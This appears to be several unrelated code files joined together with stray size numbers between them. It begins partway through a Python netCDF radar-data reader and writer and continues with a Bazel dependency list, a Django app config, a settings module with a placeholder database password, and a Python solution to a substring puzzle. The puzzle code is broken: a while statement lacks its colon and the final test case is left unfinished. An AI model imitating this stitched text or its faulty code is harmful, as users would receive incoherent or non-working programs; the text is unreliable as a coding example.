top_directory_name=top_directory_name,
height_m_asl=height_by_pair_m_asl[j],
raise_error_if_missing=this_raise_error_flag)
else:
radar_file_name_matrix[i, j] = find_raw_file_inexact_time(
desired_time_unix_sec=unique_times_unix_sec[i],
spc_date_string=this_spc_date_string,
field_name=field_name_by_pair[j], data_source=data_source,
top_directory_name=top_directory_name,
height_m_asl=height_by_pair_m_asl[j],
max_time_offset_sec=this_max_time_offset_sec,
raise_error_if_missing=this_raise_error_flag)
if radar_file_name_matrix[i, j] is None:
this_time_string = time_conversion.unix_sec_to_string(
unique_times_unix_sec[i], TIME_FORMAT_FOR_LOG_MESSAGES)
warning_string = (
'Cannot find file for "{0:s}" at {1:d} metres ASL and '
'{2:s}.'
).format(
field_name_by_pair[j], int(height_by_pair_m_asl[j]),
this_time_string
)
warnings.warn(warning_string)
return {
RADAR_FILE_NAMES_KEY: radar_file_name_matrix,
UNIQUE_TIMES_KEY: unique_times_unix_sec,
SPC_DATES_AT_UNIQUE_TIMES_KEY: spc_dates_at_unique_times_unix_sec,
FIELD_NAME_BY_PAIR_KEY: field_name_by_pair,
HEIGHT_BY_PAIR_KEY: numpy.round(height_by_pair_m_asl).astype(int)
}
def read_metadata_from_raw_file(
netcdf_file_name, data_source, raise_error_if_fails=True):
"""Reads metadata from raw (either MYRORSS or MRMS) file.
This file should contain one radar field at one height and valid time.
:param netcdf_file_name: Path to input file.
:param data_source: Data source (string).
:param raise_error_if_fails: Boolean flag. If True and file cannot be read,
this method will raise an error. If False and file cannot be read, will
return None.
:return: metadata_dict: Dictionary with the following keys.
metadata_dict['nw_grid_point_lat_deg']: Latitude (deg N) of northwesternmost
grid point.
metadata_dict['nw_grid_point_lng_deg']: Longitude (deg E) of
northwesternmost grid point.
metadata_dict['lat_spacing_deg']: Spacing (deg N) between meridionally
adjacent grid points.
metadata_dict['lng_spacing_deg']: Spacing (deg E) between zonally adjacent
grid points.
metadata_dict['num_lat_in_grid']: Number of rows (unique grid-point
latitudes).
metadata_dict['num_lng_in_grid']: Number of columns (unique grid-point
longitudes).
metadata_dict['height_m_asl']: Radar height (metres above ground level).
metadata_dict['unix_time_sec']: Valid time.
metadata_dict['field_name']: Name of radar field in GewitterGefahr format.
metadata_dict['field_name_orig']: Name of radar field in original (either
MYRORSS or MRMS) format.
metadata_dict['sentinel_values']: 1-D numpy array of sentinel values.
"""
error_checking.assert_file_exists(netcdf_file_name)
netcdf_dataset = netcdf_io.open_netcdf(
netcdf_file_name, raise_error_if_fails)
if netcdf_dataset is None:
return None
field_name_orig = str(getattr(netcdf_dataset, FIELD_NAME_COLUMN_ORIG))
metadata_dict = {
radar_utils.NW_GRID_POINT_LAT_COLUMN:
getattr(netcdf_dataset, NW_GRID_POINT_LAT_COLUMN_ORIG),
radar_utils.NW_GRID_POINT_LNG_COLUMN:
lng_conversion.convert_lng_positive_in_west(
getattr(netcdf_dataset, NW_GRID_POINT_LNG_COLUMN_ORIG),
allow_nan=False),
radar_utils.LAT_SPACING_COLUMN:
getattr(netcdf_dataset, LAT_SPACING_COLUMN_ORIG),
radar_utils.LNG_SPACING_COLUMN:
getattr(netcdf_dataset, LNG_SPACING_COLUMN_ORIG),
radar_utils.NUM_LAT_COLUMN:
netcdf_dataset.dimensions[NUM_LAT_COLUMN_ORIG].size + 1,
radar_utils.NUM_LNG_COLUMN:
netcdf_dataset.dimensions[NUM_LNG_COLUMN_ORIG].size + 1,
radar_utils.HEIGHT_COLUMN:
getattr(netcdf_dataset, HEIGHT_COLUMN_ORIG),
radar_utils.UNIX_TIME_COLUMN:
getattr(netcdf_dataset, UNIX_TIME_COLUMN_ORIG),
FIELD_NAME_COLUMN_ORIG: field_name_orig,
radar_utils.FIELD_NAME_COLUMN: radar_utils.field_name_orig_to_new(
field_name_orig=field_name_orig, data_source_name=data_source)
}
latitude_spacing_deg = metadata_dict[radar_utils.LAT_SPACING_COLUMN]
longitude_spacing_deg = metadata_dict[radar_utils.LNG_SPACING_COLUMN]
# TODO(thunderhoser): The following "if" condition is a hack. The purpose
# is to change grid corners only for actual MYRORSS data, not GridRad data
# in MYRORSS format.
if latitude_spacing_deg < 0.011 and longitude_spacing_deg < 0.011:
metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] = (
rounder.floor_to_nearest(
metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
metadata_dict[radar_utils.LAT_SPACING_COLUMN]))
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN] = (
rounder.ceiling_to_nearest(
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
metadata_dict[radar_utils.LNG_SPACING_COLUMN]))
sentinel_values = []
for this_column in SENTINEL_VALUE_COLUMNS_ORIG:
sentinel_values.append(getattr(netcdf_dataset, this_column))
metadata_dict.update({
radar_utils.SENTINEL_VALUE_COLUMN: numpy.array(sentinel_values)})
netcdf_dataset.close()
return metadata_dict
def read_data_from_sparse_grid_file(
netcdf_file_name, field_name_orig, data_source, sentinel_values,
raise_error_if_fails=True):
"""Reads sparse radar grid from raw (either MYRORSS or MRMS) file.
This file should contain one radar field at one height and valid time.
:param netcdf_file_name: Path to input file.
:param field_name_orig: Name of radar field in original (either MYRORSS or
MRMS) format.
:param data_source: Data source (string).
:param sentinel_values: 1-D numpy array of sentinel values.
:param raise_error_if_fails: Boolean flag. If True and file cannot be read,
this method will raise an error. If False and file cannot be read, will
return None.
:return: sparse_grid_table: pandas DataFrame with the following columns.
Each row corresponds to one grid point.
sparse_grid_table.grid_row: Row index.
sparse_grid_table.grid_column: Column index.
sparse_grid_table.<field_name>: Radar measurement (column name is produced
by _field_name_orig_to_new).
sparse_grid_table.num_grid_cells: Number of consecutive grid points with the
same radar measurement. Counting is row-major (to the right along the
row, then down to the next column if necessary).
"""
error_checking.assert_file_exists(netcdf_file_name)
error_checking.assert_is_numpy_array_without_nan(sentinel_values)
error_checking.assert_is_numpy_array(sentinel_values, num_dimensions=1)
netcdf_dataset = netcdf_io.open_netcdf(
netcdf_file_name, raise_error_if_fails)
if netcdf_dataset is None:
return None
field_name = radar_utils.field_name_orig_to_new(
field_name_orig=field_name_orig, data_source_name=data_source)
num_values = len(netcdf_dataset.variables[GRID_ROW_COLUMN_ORIG])
if num_values == 0:
sparse_grid_dict = {
GRID_ROW_COLUMN: numpy.array([], dtype=int),
GRID_COLUMN_COLUMN: numpy.array([], dtype=int),
NUM_GRID_CELL_COLUMN: numpy.array([], dtype=int),
field_name: numpy.array([])}
else:
sparse_grid_dict = {
GRID_ROW_COLUMN: netcdf_dataset.variables[GRID_ROW_COLUMN_ORIG][:],
GRID_COLUMN_COLUMN:
netcdf_dataset.variables[GRID_COLUMN_COLUMN_ORIG][:],
NUM_GRID_CELL_COLUMN:
netcdf_dataset.variables[NUM_GRID_CELL_COLUMN_ORIG][:],
field_name: netcdf_dataset.variables[field_name_orig][:]}
netcdf_dataset.close()
sparse_grid_table = pandas.DataFrame.from_dict(sparse_grid_dict)
return _remove_sentinels_from_sparse_grid(
sparse_grid_table, field_name=field_name,
sentinel_values=sentinel_values)
def read_data_from_full_grid_file(
netcdf_file_name, metadata_dict, raise_error_if_fails=True):
"""Reads full radar grid from raw (either MYRORSS or MRMS) file.
This file should contain one radar field at one height and valid time.
:param netcdf_file_name: Path to input file.
:param metadata_dict: Dictionary created by `read_metadata_from_raw_file`.
:param raise_error_if_fails: Boolean flag. If True and file cannot be read,
this method will raise an error. If False and file cannot be read, will
return None for all output vars.
:return: field_matrix: M-by-N numpy array with radar field. Latitude
increases while moving up each column, and longitude increases while
moving right along each row.
:return: grid_point_latitudes_deg: length-M numpy array of grid-point
latitudes (deg N). This array is monotonically decreasing.
:return: grid_point_longitudes_deg: length-N numpy array of grid-point
longitudes (deg E). This array is monotonically increasing.
"""
error_checking.assert_file_exists(netcdf_file_name)
netcdf_dataset = netcdf_io.open_netcdf(
netcdf_file_name, raise_error_if_fails)
if netcdf_dataset is None:
return None, None, None
field_matrix = netcdf_dataset.variables[
metadata_dict[FIELD_NAME_COLUMN_ORIG]]
netcdf_dataset.close()
min_latitude_deg = metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] - (
metadata_dict[radar_utils.LAT_SPACING_COLUMN] * (
metadata_dict[radar_utils.NUM_LAT_COLUMN] - 1))
grid_point_latitudes_deg, grid_point_longitudes_deg = (
grids.get_latlng_grid_points(
min_latitude_deg=min_latitude_deg,
min_longitude_deg=
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN],
num_rows=metadata_dict[radar_utils.NUM_LAT_COLUMN],
num_columns=metadata_dict[radar_utils.NUM_LNG_COLUMN]))
field_matrix = _remove_sentinels_from_full_grid(
field_matrix, metadata_dict[radar_utils.SENTINEL_VALUE_COLUMN])
return (numpy.flipud(field_matrix), grid_point_latitudes_deg[::-1],
grid_point_longitudes_deg)
def write_field_to_myrorss_file(
field_matrix, netcdf_file_name, field_name, metadata_dict,
height_m_asl=None):
"""Writes field to MYRORSS-formatted file.
M = number of rows (unique grid-point latitudes)
N = number of columns (unique grid-point longitudes)
:param field_matrix: M-by-N numpy array with one radar variable at one time.
Latitude should increase down each column, and longitude should increase
to the right along each row.
:param netcdf_file_name: Path to output file.
:param field_name: Name of radar field in GewitterGefahr format.
:param metadata_dict: Dictionary created by either
`gridrad_io.read_metadata_from_full_grid_file` or
`read_metadata_from_raw_file`.
:param height_m_asl: Height of radar field (metres above sea level).
"""
if field_name == radar_utils.REFL_NAME:
field_to_heights_dict_m_asl = (
myrorss_and_mrms_utils.fields_and_refl_heights_to_dict(
field_names=[field_name],
data_source=radar_utils.MYRORSS_SOURCE_ID,
refl_heights_m_asl=numpy.array([height_m_asl])))
else:
field_to_heights_dict_m_asl = (
myrorss_and_mrms_utils.fields_and_refl_heights_to_dict(
field_names=[field_name],
data_source=radar_utils.MYRORSS_SOURCE_ID))
field_name = list(field_to_heights_dict_m_asl.keys())[0]
radar_height_m_asl = field_to_heights_dict_m_asl[field_name][0]
if field_name in radar_utils.ECHO_TOP_NAMES:
field_matrix = METRES_TO_KM * field_matrix
field_name_myrorss = radar_utils.field_name_new_to_orig(
field_name=field_name, data_source_name=radar_utils.MYRORSS_SOURCE_ID)
file_system_utils.mkdir_recursive_if_necessary(file_name=netcdf_file_name)
netcdf_dataset = Dataset(
netcdf_file_name, 'w', format='NETCDF3_64BIT_OFFSET')
netcdf_dataset.setncattr(
FIELD_NAME_COLUMN_ORIG, field_name_myrorss)
netcdf_dataset.setncattr('DataType', 'SparseLatLonGrid')
netcdf_dataset.setncattr(
NW_GRID_POINT_LAT_COLUMN_ORIG, rounder.round_to_nearest(
metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
LATLNG_MULTIPLE_DEG))
netcdf_dataset.setncattr(
NW_GRID_POINT_LNG_COLUMN_ORIG, rounder.round_to_nearest(
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
LATLNG_MULTIPLE_DEG))
netcdf_dataset.setncattr(
HEIGHT_COLUMN_ORIG,
METRES_TO_KM * numpy.float(radar_height_m_asl))
netcdf_dataset.setncattr(
UNIX_TIME_COLUMN_ORIG,
numpy.int32(metadata_dict[radar_utils.UNIX_TIME_COLUMN]))
netcdf_dataset.setncattr('FractionalTime', 0.)
netcdf_dataset.setncattr('attributes', ' ColorMap SubType Unit')
netcdf_dataset.setncattr('ColorMap-unit', 'dimensionless')
netcdf_dataset.setncattr('ColorMap-value', '')
netcdf_dataset.setncattr('SubType-unit', 'dimensionless')
netcdf_dataset.setncattr('SubType-value', numpy.float(radar_height_m_asl))
netcdf_dataset.setncattr('Unit-unit', 'dimensionless')
netcdf_dataset.setncattr('Unit-value', 'dimensionless')
netcdf_dataset.setncattr(
LAT_SPACING_COLUMN_ORIG, rounder.round_to_nearest(
metadata_dict[radar_utils.LAT_SPACING_COLUMN],
LATLNG_MULTIPLE_DEG))
netcdf_dataset.setncattr(
LNG_SPACING_COLUMN_ORIG, rounder.round_to_nearest(
metadata_dict[radar_utils.LNG_SPACING_COLUMN],
LATLNG_MULTIPLE_DEG))
netcdf_dataset.setncattr(
SENTINEL_VALUE_COLUMNS_ORIG[0], numpy.double(-99000.))
netcdf_dataset.setncattr(
SENTINEL_VALUE_COLUMNS_ORIG[1], numpy.double(-99001.))
min_latitude_deg = metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] - (
metadata_dict[radar_utils.LAT_SPACING_COLUMN] *
(metadata_dict[radar_utils.NUM_LAT_COLUMN] - 1))
unique_grid_point_lats_deg, unique_grid_point_lngs_deg = (
grids.get_latlng_grid_points(
min_latitude_deg=min_latitude_deg,
min_longitude_deg=
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN],
num_rows=metadata_dict[radar_utils.NUM_LAT_COLUMN],
num_columns=metadata_dict[radar_utils.NUM_LNG_COLUMN]))
num_grid_rows = len(unique_grid_point_lats_deg)
num_grid_columns = len(unique_grid_point_lngs_deg)
field_vector = numpy.reshape(field_matrix, num_grid_rows * num_grid_columns)
grid_point_lat_matrix, grid_point_lng_matrix = (
grids.latlng_vectors_to_matrices(
unique_grid_point_lats_deg, unique_grid_point_lngs_deg))
grid_point_lat_vector = numpy.reshape(
grid_point_lat_matrix, num_grid_rows * num_grid_columns)
grid_point_lng_vector = numpy.reshape(
grid_point_lng_matrix, num_grid_rows * num_grid_columns)
real_value_indices = numpy.where(numpy.invert(numpy.isnan(field_vector)))[0]
netcdf_dataset.createDimension(
NUM_LAT_COLUMN_ORIG, num_grid_rows - 1)
netcdf_dataset.createDimension(
NUM_LNG_COLUMN_ORIG, num_grid_columns - 1)
netcdf_dataset.createDimension(
NUM_PIXELS_COLUMN_ORIG, len(real_value_indices))
row_index_vector, column_index_vector = radar_utils.latlng_to_rowcol(
grid_point_lat_vector, grid_point_lng_vector,
nw_grid_point_lat_deg=
metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
nw_grid_point_lng_deg=
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN])
netcdf_dataset.createVariable(
field_name_myrorss, numpy.single, (NUM_PIXELS_COLUMN_ORIG,))
netcdf_dataset.createVariable(
GRID_ROW_COLUMN_ORIG, numpy.int16, (NUM_PIXELS_COLUMN_ORIG,))
netcdf_dataset.createVariable(
GRID_COLUMN_COLUMN_ORIG, numpy.int16, (NUM_PIXELS_COLUMN_ORIG,))
netcdf_dataset.createVariable(
NUM_GRID_CELL_COLUMN_ORIG, numpy.int32, (NUM_PIXELS_COLUMN_ORIG,))
netcdf_dataset.variables[field_name_myrorss].setncattr(
'BackgroundValue', numpy.int32(-99900))
netcdf_dataset.variables[field_name_myrorss].setncattr(
'units', 'dimensionless')
netcdf_dataset.variables[field_name_myrorss].setncattr(
'NumValidRuns', numpy.int32(len(real_value_indices)))
netcdf_dataset.variables[field_name_myrorss][:] = field_vector[
real_value_indices]
netcdf_dataset.variables[GRID_ROW_COLUMN_ORIG][:] = (
row_index_vector[real_value_indices])
netcdf_dataset.variables[GRID_COLUMN_COLUMN_ORIG][:] = (
column_index_vector[real_value_indices])
netcdf_dataset.variables[NUM_GRID_CELL_COLUMN_ORIG][:] = (
numpy.full(len(real_value_indices), 1, dtype=int))
netcdf_dataset.close()
| 38,214 | 13,665 |
from setup.Base import Base
from setup.Docker import Docker
from setup.SystemD import SystemD
| 94 | 25 |
# Copyright 2021 Cory Paik. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
""" Research repositories """
load("//tools:maybe_http.bzl", "http_archive")
def _clean_dep(x):
return str(Label(x))
def _py_repositories():
http_archive(
name = "pytoolz_toolz",
build_file = _clean_dep("//third_party:toolz.BUILD"),
sha256 = "5c6ebde36ec2ceb9d6b3946105ba10b25237a67daee4eb80d62c508b9c4c2f55",
strip_prefix = "toolz-0.11.1",
urls = [
"https://github.com/pytoolz/toolz/archive/0.11.1.tar.gz",
],
)
http_archive(
name = "pytoolz_cytoolz",
build_file = _clean_dep("//third_party:cytoolz.BUILD"),
sha256 = "dba4a9d95e49f4f3cb5c41937f55dffe600aca5a7e640e3c2a56d9224923d7bb",
strip_prefix = "cytoolz-0.11.0",
urls = [
"https://github.com/pytoolz/cytoolz/archive/0.11.0.tar.gz",
],
)
http_archive(
name = "dm_tensor_annotations",
build_file = _clean_dep("//third_party:tensor_annotations.BUILD"),
patch_args = ["-p1"],
patches = [Label("//third_party:tensor_annotations.patch")],
sha256 = "d0a932efa70b1465860b14b5bbaf9b8eae8666133b28e74eaebdec9f30053f39",
strip_prefix = "tensor_annotations-b24a6213d20e806d9f06f4af9e0c0d1707b26d3e",
urls = [
"https://github.com/deepmind/tensor_annotations/archive/b24a6213d20e806d9f06f4af9e0c0d1707b26d3e.tar.gz",
],
)
http_archive(
name = "python_typeshed",
build_file = _clean_dep("//third_party:typeshed.BUILD"),
sha256 = "804110a0f0224f9f59d1854e6e9dd20157a899fcf1cd61f2376f29e2663a6c3e",
strip_prefix = "typeshed-53087be4eb935e5db24e9dddad3567ecaf1909a7",
urls = [
"https://github.com/python/typeshed/archive/53087be4eb935e5db24e9dddad3567ecaf1909a7.tar.gz",
],
)
http_archive(
name = "dm_rlax",
build_file = _clean_dep("//third_party:rlax.BUILD"),
sha256 = "d2283be962dc697882ff371813c64220a2c34a5538ca017d5bf699848426be3f",
strip_prefix = "rlax-4e8aeed362d65ebb80bac162f09994c322c966a1",
urls = ["https://github.com/deepmind/rlax/archive/4e8aeed362d65ebb80bac162f09994c322c966a1.tar.gz"],
)
http_archive(
name = "dm_optax",
build_file = _clean_dep("//third_party:optax.BUILD"),
sha256 = "39a48c13be5e8259656dc7ed613dceaea9b205e1927b8b87db3c0e8181f18739",
strip_prefix = "optax-0.0.9",
urls = ["https://github.com/deepmind/optax/archive/v0.0.9.tar.gz"],
)
http_archive(
name = "dm_chex",
build_file = _clean_dep("//third_party:chex.BUILD"),
sha256 = "d6a2410d77879e0f768cb0796f3156c78627a28ef6362ac725582b77af32ca64",
strip_prefix = "chex-fb7924766dec32cc9201149b66908545b44d03a9",
urls = ["https://github.com/deepmind/chex/archive/fb7924766dec32cc9201149b66908545b44d03a9.tar.gz"],
)
http_archive(
name = "com_google_flax",
build_file = _clean_dep("//third_party:flax.BUILD"),
sha256 = "b0da699b317fe028f6b0ae94174ec0a17ca376a79ca0a48e5b106ee7070d849c",
strip_prefix = "flax-0.3.5",
urls = ["https://github.com/google/flax/archive/v0.3.5.tar.gz"],
)
http_archive(
name = "dm_tree",
build_file = _clean_dep("//third_party:tree.BUILD"),
sha256 = "542449862e600e50663128a31cd4e262880f423f8bc66a64748f9bb20762cfbe",
strip_prefix = "tree-42e87fda83278e2eb32bb55225e1d1511e77c10c",
urls = ["https://github.com/deepmind/tree/archive/42e87fda83278e2eb32bb55225e1d1511e77c10c.tar.gz"],
)
http_archive(
name = "dm_fancyflags",
build_file = _clean_dep("//third_party:fancyflags.BUILD"),
sha256 = "19805c12d7512c9e2806c0a6fea352381b4718e25d94d94960e8f3e61e3e4ab2",
strip_prefix = "fancyflags-2e13d9818fb41dbb4476c4ebbcfe5f5a35643ef0",
url = "https://github.com/deepmind/fancyflags/archive/2e13d9818fb41dbb4476c4ebbcfe5f5a35643ef0.tar.gz",
)
http_archive(
name = "hf_transformers",
build_file = _clean_dep("//third_party/py:transformers.BUILD"),
patch_args = ["-p1"],
patches = [_clean_dep("//third_party/py:transformers.patch")],
sha256 = "30d9e30583e47680fd7b9809138c4cd83166fa0770f0113a1e06c3f65b848b4d",
strip_prefix = "transformers-4.10.3",
urls = [
"https://github.com/huggingface/transformers/archive/v4.10.3.tar.gz",
],
)
def _coda_repositories():
http_archive(
name = "com_github_openai_clip",
build_file = _clean_dep("//third_party:clip.BUILD"),
sha256 = "8949674a42169c92bd1b280b895a8ecdd7e3fe922878f0d8ea8521e09b9e5141",
strip_prefix = "CLIP-e184f608c5d5e58165682f7c332c3a8b4c1545f2",
urls = ["https://github.com/openai/CLIP/archive/e184f608c5d5e58165682f7c332c3a8b4c1545f2.tar.gz"],
)
http_archive(
name = "com_github_willwhitney_reprieve",
build_file = _clean_dep("//third_party:reprieve.BUILD"),
sha256 = "5d8e3ae90582a82f5e1f9dc65b007e9556048c2c728e85c8c4d80fa82258794a",
strip_prefix = "reprieve-004e09a37e3c595c450ab05342cd779fa28be462",
urls = ["https://github.com/willwhitney/reprieve/archive/004e09a37e3c595c450ab05342cd779fa28be462.tar.gz"],
)
def research_repositories():
""" Research repositories """
# Override tensorflow @rules_python version. As of 2021-09-21, the only
# target for which tensorflow uses @rules_python is:
# @org_tensorflow//tensorflow/platform/python/platform:platform
# This uses @rules_python//python/runfiles, which still exists in v0.4.0.
http_archive(
name = "rules_python",
sha256 = "954aa89b491be4a083304a2cb838019c8b8c3720a7abb9c4cb81ac7a24230cea",
urls = [
"https://mirror.bazel.build/github.com/bazelbuild/rules_python/releases/download/0.4.0/rules_python-0.4.0.tar.gz",
"https://github.com/bazelbuild/rules_python/releases/download/0.4.0/rules_python-0.4.0.tar.gz",
],
)
############################################################################
# JAX & Tensoflow
http_archive(
name = "org_tensorflow",
patch_args = ["-p1"],
patches = [
"@com_google_jax//third_party:tensorflow.patch",
Label("//third_party:tensorflow-sqlite.patch"),
Label("//third_party:tensorflow-pyconfig.patch"),
],
sha256 = "6b14b66a74728736359afcb491820fa3e713ea4a74bff0defe920f3453a3a0f0",
strip_prefix = "tensorflow-b5b1ff47ad250c3e38dcadef5f6bc414b0a533ee",
urls = [
"https://github.com/tensorflow/tensorflow/archive/b5b1ff47ad250c3e38dcadef5f6bc414b0a533ee.tar.gz",
],
)
http_archive(
name = "com_google_jax",
sha256 = "a2f6e35e0d1b5d2bed88e815d27730338072601003fce93e6c49442afa3d8d96",
strip_prefix = "jax-c3bacb49489aac6eb565611426022b3dd2a430fa",
urls = [
"https://github.com/corypaik/jax/archive/c3bacb49489aac6eb565611426022b3dd2a430fa.tar.gz",
],
)
############################################################################
http_archive(
name = "bazel_gazelle",
sha256 = "62ca106be173579c0a167deb23358fdfe71ffa1e4cfdddf5582af26520f1c66f",
urls = [
"https://mirror.bazel.build/github.com/bazelbuild/bazel-gazelle/releases/download/v0.23.0/bazel-gazelle-v0.23.0.tar.gz",
"https://github.com/bazelbuild/bazel-gazelle/releases/download/v0.23.0/bazel-gazelle-v0.23.0.tar.gz",
],
)
http_archive(
name = "com_github_bazelbuild_buildtools",
sha256 = "b8b69615e8d9ade79f3612311b8d0c4dfe01017420c90eed11db15e9e7c9ff3c",
strip_prefix = "buildtools-4.2.1",
url = "https://github.com/bazelbuild/buildtools/archive/4.2.1.tar.gz",
)
# we rely on dbx_build_tools for the inbuild python interpreter deps.
http_archive(
name = "dbx_build_tools",
patch_args = ["-p1"],
sha256 = "151b77cf5d1b06884bc2da350322e33ef5289237622196467988894c57616a0c",
strip_prefix = "dbx_build_tools-a5ae53031f11d9114cdbc40da8a84b5d28af58f7",
urls = ["https://github.com/dropbox/dbx_build_tools/archive/a5ae53031f11d9114cdbc40da8a84b5d28af58f7.tar.gz"],
)
http_archive(
name = "facebook_zstd",
build_file_content = """exports_files(["zstd"])""",
patch_cmds = ["make zstd"],
sha256 = "5194fbfa781fcf45b98c5e849651aa7b3b0a008c6b72d4a0db760f3002291e94",
strip_prefix = "zstd-1.5.0",
urls = ["https://github.com/facebook/zstd/releases/download/v1.5.0/zstd-1.5.0.tar.gz"],
)
http_archive(
name = "io_bazel_stardoc",
sha256 = "cd3d1e483eddf9f73db2bd466f329e1d10d65492272820eda57540767c902fe2",
strip_prefix = "stardoc-0.5.0",
urls = ["https://github.com/bazelbuild/stardoc/archive/0.5.0.tar.gz"],
)
# Overwrite @dbx_build_tools version of cpython3.8. Note that we use the
# same version, just with a different BUILD file. We could (and used to)
# just use a patch, but it becomes frustrating to make fixes and we'd like
# to avoid another having yet another submodule.
http_archive(
name = "org_python_cpython_38",
build_file = _clean_dep("//third_party/cpython:python38.BUILD"),
sha256 = "75894117f6db7051c1b34f37410168844bbb357c139a8a10a352e9bf8be594e8",
strip_prefix = "Python-3.8.1",
urls = ["https://www.python.org/ftp/python/3.8.1/Python-3.8.1.tar.xz"],
)
_py_repositories()
# for specific projects
_coda_repositories()
| 10,325 | 4,862 |
from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
class DiveLogConfig(AppConfig):
name = 'dive_log'
verbose_name = _(u'Dyklog') | 177 | 61 |
import json
import logging
import sys
from decouple import config
# general
ENVIRONMENT: str = config("ENVIRONMENT", "docker")
API_VERSION: str = config("API_VERSION", "/api")
PROJECT_NAME: str = config("PROJECT_NAME", "Stocks")
BACKEND_CORS_ORIGINS: str = config("BACKEND_CORS_ORIGINS", "*")
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
# logging
MILLISECONDS_LENGTH = 3
MODULE_NAME_LENGTH = 20
LINE_NUMBER_LENGTH = 5
LOGGING_LEVEL_NAME_LENGTH = 8
LOG_FORMAT = (
f"[%(asctime)s"
f".%(msecs){MILLISECONDS_LENGTH}d] "
f"[%(module){MODULE_NAME_LENGTH}s] "
f"[%(lineno){LINE_NUMBER_LENGTH}d] "
f"[%(levelname){LOGGING_LEVEL_NAME_LENGTH}s]: "
f"%(message)s"
)
logging.basicConfig(
datefmt=DATETIME_FORMAT,
format=LOG_FORMAT,
level=logging.DEBUG,
stream=sys.stdout,
force=True,
)
# time periods
HALF_AN_HOUR = 1800
# database
DATABASE_PASSWORD: str = config("DATABASE_PASSWORD", "gibberish")
DATABASE_HOST: str = config(
"DATABASE_HOST", "database" if ENVIRONMENT == "docker" else "127.0.0.1"
)
DATABASE_PORT: int = config("DATABASE_PORT", 5005, cast=int)
DATABASE_NAME: int = config("DATABASE_NAME", 0, cast=int)
TIME_TO_LIVE_IN_SECONDS: int = config(
"TIME_TO_LIVE_IN_SECONDS", HALF_AN_HOUR, cast=int
)
# sockets
BINANCE_WEB_SOCKET_URL: str = config(
"BINANCE_WEB_SOCKET_URL",
"wss://stream.binance.com:9443/stream?streams=!miniTicker@arr",
)
SOCKET_MESSAGE_LENGTH: int = config("SOCKET_MESSAGE_LENGTH", 4096, cast=int)
SOCKET_DISCONNECT_MESSAGE: str = config(
"SOCKET_DISCONNECT_MESSAGE", "DISCONNECTED!"
)
ENCODING_FORMAT: str = "utf-8"
LOCAL_APP_CFG = """
{
"SOCKET_CONNECTIONS": [
{
"url_slug": "dxfeed",
"source_type": "dxfeed",
"HOST": "127.0.0.1",
"PORT": 1234
},
{
"url_slug": "dxfeed",
"source_type": "mc_fix",
"HOST": "127.0.0.1",
"PORT": 4321
}
]
}
"""
LOCAL_APP_CFG = """
{
"SOCKET_CONNECTIONS": [
{
"url_slug": "dxfeed",
"source_type": "dxfeed",
"HOST": "127.0.0.1",
"PORT": 1234
},
{
"url_slug": "dxfeed",
"source_type": "mc_fix",
"HOST": "127.0.0.1",
"PORT": 4321
}
]
}
"""
APP_CFG = config("APP_CFG", LOCAL_APP_CFG)
try:
if ENVIRONMENT == "localhost":
SOCKET_CONNECTIONS = json.loads(LOCAL_APP_CFG).get(
"SOCKET_CONNECTIONS"
)
else:
SOCKET_CONNECTIONS = json.loads(APP_CFG).get("SOCKET_CONNECTIONS")
SOCKET_SOURCE_TYPES = {
f"{connection.get('PORT')}": connection.get("source_type")
for connection in SOCKET_CONNECTIONS
}
except Exception as e:
logging.error("failed to get socket connections configuration")
logging.error(e)
sys.exit(1)
# data validation
ASSET_DECIMAL_PLACES = 10
| 3,051 | 1,212 |
#This problem was asked by Amazon.
#Given an integer k and a string s, find the length of the longest substring that contains at most k distinct characters.
#For example, given s = "abcba" and k = 2, the longest substring with k distinct characters is "bcb".
def DCP_13(s,k):
#ciel k by the number of unique characters in the string.
k = min(len(set(s)),k)
#handle simply maximal/minimal trivial cases:
if len(set(s)) == k:
print(len(s))
elif k == 1:
print(1)
#handle all other cases
else:
#store longest string in out
out=str()
#iterate overall positions of the string
for j in range(len(s)):
#set position of first character in current run
i=0
#reset reviewed substring for current run
left=str()
#get the longest consecutive substring of k unique characters, starting at position i
#limit loop count to length of s -- this could be shortened to the # of yet unevaluated charactersthis run to speed execution time on long strings
while len(set(left)) <= k and i <= len(s)
left=s[j:i+1]
i=i+1
#test whether the current run is the longest so far, if so save it as the best candidate.
if len(out) < len(left[:-1]):
out = left[:-1]
#print the length of the best candidate
print(len(out))
#test example from prompt
s = "abcba"
k = 2
DCP_13(s,k)
#3
#test where k = total number of elements in s
s = "abcba"
k = 3
DCP_13(s,k)
#5
#test where k > total number of elements in s
s = "abcba"
k = 4
DCP_13(s,k)
#5
#test repeated values
s = "bbcba"
k = 2
DCP_13(s,k)
#4
#test longer strings
s = 'find the length of the longest substring that contains at most k distinct characters'
k = 5
DCP_13(s,k)
#8
#test karger values of k
s = 'Given an integer k and a string s, find the length of the longest substring that contains at most k distinct characters.'
k = 16
